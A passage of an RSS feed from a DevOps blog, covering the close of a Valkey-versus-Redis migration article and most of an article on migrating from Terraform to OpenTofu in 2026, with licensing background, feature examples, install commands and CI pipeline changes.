</code></pre><p>On AWS, the path is even shorter. ElastiCache offers an in-place upgrade from supported Redis OSS versions to Valkey, so you can switch the engine on an existing cluster without standing up new infrastructure.</p>
<h3 id="h3-step-5-test-on-staging-first" class="group relative scroll-mt-24">
        <a href="#h3-step-5-test-on-staging-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 5: test on staging first
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-5-test-on-staging-first"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Run your full test suite against Valkey in staging before production. Pay attention to anything that calls a command added after the 7.2.4 fork, or any module you assumed was present. A clean migration behaves identically because the command surface is the same.</p>
<h2 id="h2-should-you-switch-a-quick-framework" class="group relative scroll-mt-24">
        <a href="#h2-should-you-switch-a-quick-framework" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Should you switch? A quick framework
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-should-you-switch-a-quick-framework"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is no single right answer, so match the choice to your situation.</p>
<p><strong>Move to Valkey</strong> if you self-host and want a permissive license that cannot be changed under you, if you want to cut managed cache costs on AWS or Google Cloud, or if you build a product on top of the engine and want to avoid the AGPL network clause.</p>
<p><strong>Stay on or choose Redis 8</strong> if you need the bundled core modules, especially vector sets and the Query Engine for AI features, or if you rely on Redis Enterprise capabilities like active-active replication and a vendor support contract.</p>
<p><strong>It is a tie, so do not rush</strong> if you run a managed cache, never modify the engine, and are happy with your costs. Both are open source, both are fast, and the migration stays easy. Switch the day cost or features change the math, not before.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The Valkey question is settled enough to act on in 2026. Valkey is production-ready, wire-compatible, governed by a foundation, and cheaper on managed services. Redis answered the criticism that started the fork by returning to open source with Redis 8, and it now ships a richer core with search and vector sets built in.</p>
<p>The mental model to keep:</p>
<ul>
<li>The license split is real but narrower than the headlines: BSD (Valkey) versus AGPL copyleft (Redis). AGPL only matters if you modify and serve the engine.</li>
<li>The migration is easy and low-risk for Redis 7.2.x: same protocol, same files, and an in-place path on ElastiCache.</li>
<li>The divergence to watch is post-fork features. Redis 8 bundles modules into core; Valkey keeps them separate.</li>
</ul>
<p>Decide on what you actually need, the license terms, the managed cost, and the built-in features, rather than on which project has the louder story. For the head-to-head table, the <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a> covers it point by point.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTofu in 2026: Should You Switch from Terraform (and What It Actually Costs You)]]></title>
      <link>https://devops-daily.com/posts/opentofu-2026-switch-from-terraform</link>
      <description><![CDATA[OpenTofu has matured into a real Terraform alternative in 2026. Here is what the fork gives you, why the migration is easier than you think, and where the actual lock-in hides.]]></description>
      <pubDate>Tue, 02 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentofu-2026-switch-from-terraform</guid>
      <category><![CDATA[Terraform]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Terraform]]></category><category><![CDATA[OpenTofu]]></category><category><![CDATA[Infrastructure as Code]]></category><category><![CDATA[Migration]]></category><category><![CDATA[State Management]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you manage infrastructure with Terraform, one question has been sitting in your backlog since 2023: do you stay on Terraform, or move to OpenTofu? For a long time the honest answer was &quot;wait and see.&quot; The fork was young, the feature gap was small, and nobody wanted to bet production state files on a project that might fade.</p>
<p>In 2026 the picture is clearer. HashiCorp is now part of IBM, Terraform stayed on a source-available license, and OpenTofu has shipped real features that Terraform&#39;s open-source CLI does not have. The fork is no longer a protest vote. It is a working tool with its own roadmap.</p>
<p>This post answers the practical question directly. What changed, what OpenTofu gives you that Terraform does not, how the migration actually works (it is easier than most people expect), where the real lock-in hides, and a simple framework for deciding whether to switch now, run both, or stay put.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Terraform is now an IBM product under the BSL 1.1 source-available license. OpenTofu is MPL 2.0, sits in the CNCF, and is governed so no single company controls it.</li>
<li>OpenTofu v1.12 (May 2026) ships features Terraform&#39;s open-source CLI lacks: native state encryption, the <code>-exclude</code> flag, provider <code>for_each</code>, and early variable evaluation.</li>
<li>Migrating from Terraform to OpenTofu is the easy part. The state format is the same, you swap the <code>terraform</code> binary for <code>tofu</code>, run <code>tofu init</code>, and validate with <code>tofu plan</code>. It is reversible.</li>
<li>The real lock-in starts later, once you adopt OpenTofu-only features like encrypted state. After that, going back to Terraform is no longer clean.</li>
<li>Switch now if you want the new features or open governance. Run both if you have a large estate tied to HashiCorp Cloud. Stay if you are happy on Terraform Cloud and licensing does not affect you.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A working Terraform setup (CLI 1.5 or later) with at least one project and a state file</li>
<li>Access to your state backend (S3, GCS, Azure Blob, Terraform Cloud, or local)</li>
<li>Permission to change your CI/CD pipeline definitions</li>
<li>A test or staging workspace you can migrate before touching production</li>
</ul>
<h2 id="h2-the-2026-reality-who-owns-what" class="group relative scroll-mt-24">
        <a href="#h2-the-2026-reality-who-owns-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 2026 reality: who owns what
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-2026-reality-who-owns-what"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Two things drive the decision in 2026, and neither is about syntax.</p>
<p>First, ownership. IBM completed its acquisition of HashiCorp, a 6.4 billion dollar deal, in early 2025. Terraform is now an IBM product. IBM has a long history of keeping acquisitions open, with Red Hat the obvious example, but the Terraform license has not moved.</p>
<p>Second, licensing. In August 2023 HashiCorp moved Terraform from the Mozilla Public License (MPL) 2.0 to the Business Source License (BSL) 1.1. The BSL is source-available, not open source. It restricts using Terraform to build a competing product, and each release converts back to MPL only four years after it ships. For most teams that run Terraform internally, the BSL changes nothing day to day. For anyone building tooling around Terraform, or who cares about vendor-neutral governance, it matters.</p>
<p>OpenTofu sits on the other side of that line. It was forked from the last MPL-licensed Terraform release, so the BSL never applied to its code. The CNCF accepted OpenTofu in April 2025, and a Technical Steering Committee under the Linux Foundation sets the roadmap. No single company has the votes to change the license or the direction.</p>
<pre><code class="hljs language-text">                 Terraform                  OpenTofu
License          BSL 1.1 (source-available) MPL 2.0 (open source)
Owner            IBM (HashiCorp)            CNCF / Linux Foundation
Governance       Single vendor              Multi-company TSC
State format     .tfstate (JSON)            .tfstate (JSON, same)
</code></pre><h2 id="h2-what-opentofu-has-that-terraform-does-not" class="group relative scroll-mt-24">
        <a href="#h2-what-opentofu-has-that-terraform-does-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What OpenTofu has that Terraform does not
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-opentofu-has-that-terraform-does-not"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>By 2026 OpenTofu is past parity in several areas. These are the features that actually pull teams across.</p>
<h3 id="h3-native-state-encryption" class="group relative scroll-mt-24">
        <a href="#h3-native-state-encryption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Native state encryption
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-native-state-encryption"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Terraform&#39;s state file holds everything, including resource attributes that are often sensitive. By default it sits in plaintext in your backend. If someone reads your S3 bucket, they read your state.</p>
<p>OpenTofu encrypts state at rest, including remote state, with no external wrapper. You configure a key provider (AWS KMS, GCP KMS, Vault, or a passphrase) and a method, and OpenTofu handles the rest.</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">terraform</span> {
  encryption {
    key_provider <span class="hljs-string">&quot;aws_kms&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
      kms_key_id = <span class="hljs-string">&quot;arn:aws:kms:us-east-1:111122223333:key/abcd-1234&quot;</span>
      region     = <span class="hljs-string">&quot;us-east-1&quot;</span>
      key_spec   = <span class="hljs-string">&quot;AES_256&quot;</span>
    }

    method <span class="hljs-string">&quot;aes_gcm&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
      keys = key_provider.aws_kms.main
    }

    state {
      method = method.aes_gcm.main
    }

    plan {
      method = method.aes_gcm.main
    }
  }
}
</code></pre><p>Now, even if the backend is exposed, the state and plan files are unreadable without the key. Terraform&#39;s open-source CLI has no equivalent.</p>
<h3 id="h3-provider-for_each" class="group relative scroll-mt-24">
        <a href="#h3-provider-for_each" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Provider for_each
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-provider-for_each"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>You can define multiple instances of a provider and iterate over them. This is the clean answer to the old problem of managing one provider configuration per region or per account without copy-pasting blocks for each one.</p>
<h3 id="h3-the-exclude-flag" class="group relative scroll-mt-24">
        <a href="#h3-the-exclude-flag" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The -exclude flag
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-exclude-flag"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><code>-target</code> lets you act on a specific resource. OpenTofu adds the inverse, <code>-exclude</code>, so you can plan or apply everything except a resource you want to leave alone.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Apply everything except the database, which you are handling separately</span>
tofu apply -exclude=aws_db_instance.primary
</code></pre><h3 id="h3-early-variable-evaluation" class="group relative scroll-mt-24">
        <a href="#h3-early-variable-evaluation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Early variable evaluation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-early-variable-evaluation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>OpenTofu can evaluate variables early, which means you can use them in places Terraform rejects, such as module <code>source</code> and <code>backend</code> configuration. That removes a class of workarounds teams have carried for years.</p>
<h3 id="h3-what-v112-added-may-2026" class="group relative scroll-mt-24">
        <a href="#h3-what-v112-added-may-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What v1.12 added (May 2026)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-v112-added-may-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The 1.12 release kept the gap open. Two changes that matter in daily use:</p>
<ul>
<li><code>destroy = false</code> in a resource lifecycle lets OpenTofu remove an object from state without destroying the real resource, a declarative version of <code>state rm</code>.</li>
<li><code>prevent_destroy</code> can now reference variables and other symbols in the module, instead of only a literal <code>true</code> or <code>false</code>.</li>
</ul>
<p>None of these is a reason to switch on its own. Together they show the fork is shipping, not coasting.</p>
<h2 id="h2-the-migration-is-the-easy-part" class="group relative scroll-mt-24">
        <a href="#h2-the-migration-is-the-easy-part" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The migration is the easy part
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-migration-is-the-easy-part"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part most teams get backwards. They treat the migration as the risk. It is not. Terraform and OpenTofu share the same state format. OpenTofu reads and writes the same <code>.tfstate</code> JSON that Terraform produces. For most projects, moving over is a binary swap and a pipeline change.</p>
<h3 id="h3-step-1-back-up-your-state" class="group relative scroll-mt-24">
        <a href="#h3-step-1-back-up-your-state" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: back up your state
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-1-back-up-your-state"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Always start here, no matter how confident you are.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Pull the current state to a local file before touching anything</span>
terraform state pull &gt; terraform.tfstate.backup
</code></pre><p>If you use a remote backend, also confirm you have versioning enabled (S3 versioning, for example) so you can roll back.</p>
<h3 id="h3-step-2-install-the-tofu-binary" class="group relative scroll-mt-24">
        <a href="#h3-step-2-install-the-tofu-binary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: install the tofu binary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-2-install-the-tofu-binary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><pre><code class="hljs language-bash"><span class="hljs-comment"># macOS</span>
brew install opentofu

<span class="hljs-comment"># Linux, via the official install script</span>
curl -fsSL https://get.opentofu.org/install-opentofu.sh -o install-opentofu.sh
<span class="hljs-built_in">chmod</span> +x install-opentofu.sh
./install-opentofu.sh --install-method deb

tofu version
<span class="hljs-comment"># OpenTofu v1.12.0</span>
</code></pre><h3 id="h3-step-3-initialize-with-opentofu" class="group relative scroll-mt-24">
        <a href="#h3-step-3-initialize-with-opentofu" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: initialize with OpenTofu
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-3-initialize-with-opentofu"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Run <code>tofu init</code> in the project. This re-initializes the working directory and pulls providers from the OpenTofu registry instead of the Terraform registry.</p>
<pre><code class="hljs language-bash">tofu init
<span class="hljs-comment"># Initializing the backend...</span>
<span class="hljs-comment"># Initializing provider plugins...</span>
<span class="hljs-comment"># - Finding hashicorp/aws versions matching &quot;&gt;= 5.0&quot;...</span>
<span class="hljs-comment"># - Installing hashicorp/aws v5.x...</span>
<span class="hljs-comment"># OpenTofu has been successfully initialized!</span>
</code></pre><h3 id="h3-step-4-plan-before-you-apply" class="group relative scroll-mt-24">
        <a href="#h3-step-4-plan-before-you-apply" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: plan before you apply
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-4-plan-before-you-apply"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is the rule that keeps you safe. Your first OpenTofu command against existing state is always <code>tofu plan</code>, never <code>tofu apply</code>. A clean migration shows no changes.</p>
<pre><code class="hljs language-bash">tofu plan
<span class="hljs-comment"># No changes. Your infrastructure matches the configuration.</span>
</code></pre><p>If you see unexpected changes, stop and investigate before applying. Common causes are provider version drift or a Terraform version that wrote state OpenTofu does not recognize. The version-skew note below covers the second case.</p>
<h3 id="h3-step-5-update-cicd" class="group relative scroll-mt-24">
        <a href="#h3-step-5-update-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 5: update CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-step-5-update-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Find every place your pipelines call <code>terraform</code> and swap it for <code>tofu</code>. The subcommands and flags are the same.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># Before (GitHub Actions)</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">init</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">plan</span> <span class="hljs-string">-out=tfplan</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">apply</span> <span class="hljs-string">tfplan</span>

<span class="hljs-comment"># After</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">init</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">plan</span> <span class="hljs-string">-out=tfplan</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">apply</span> <span class="hljs-string">tfplan</span>
</code></pre><p>For most teams, that is the whole migration. No state surgery, no rewrite.</p>
<h2 id="h2-where-the-real-lock-in-hides" class="group relative scroll-mt-24">
        <a href="#h2-where-the-real-lock-in-hides" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the real lock-in hides
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-the-real-lock-in-hides"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If the migration is reversible, why does anyone hesitate? Because reversibility has a shelf life.</p>
<p>The moment you adopt an OpenTofu-only feature, the door starts closing. Encrypted state is the clearest example. Once OpenTofu writes an encrypted state file, Terraform cannot read it. The same applies to configuration that uses provider <code>for_each</code> or early evaluation in ways Terraform&#39;s parser rejects. Your code and state quietly become OpenTofu-shaped.</p>
<p>That is not a trap, it is a choice. Just make it on purpose. As long as you stay on shared features, you can move back to Terraform by swapping the binary the other way. Once you use the features that pulled you over, plan to stay.</p>
<h3 id="h3-the-version-skew-gotcha" class="group relative scroll-mt-24">
        <a href="#h3-the-version-skew-gotcha" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
